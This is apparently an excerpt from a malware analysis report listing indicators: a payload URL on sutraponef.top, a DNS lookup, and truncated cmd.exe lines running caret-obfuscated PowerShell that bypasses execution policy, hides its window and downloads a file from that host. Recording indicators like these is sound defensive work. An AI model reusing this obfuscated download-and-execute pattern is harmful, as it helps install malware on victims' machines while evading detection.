Technical Information
- http://sutraponef.top/read.php?f=0.dat as %appdata%.exe
- '<SYSTEM32>\cmd.exe' /C "powE^r^SH^ElL.E^xe -^e^Xecutio^n^PolICY ^B^y^P^A^ss -NO^PrO^Fi^l^e^ ^-Window^sTYl^E H^Id^dE^N ^(Ne^W-oB^jEcT^ S^ysTeM.ne^T.WE^B^CliEnT)^.d^O^w^Nl^OaD^FI^LE(^'http://sutraponef.to...
- DNS ASK su###ponef.top
- '<SYSTEM32>\cmd.exe' /C "powE^r^SH^ElL.E^xe -^e^Xecutio^n^PolICY ^B^y^P^A^ss -NO^PrO^Fi^l^e^ ^-Window^sTYl^E H^Id^dE^N ^(Ne^W-oB^jEcT^ S^ysTeM.ne^T.WE^B^CliEnT)^.d^O^w^Nl^OaD^FI^LE(^'http://sutraponef.to...' (with hidden window)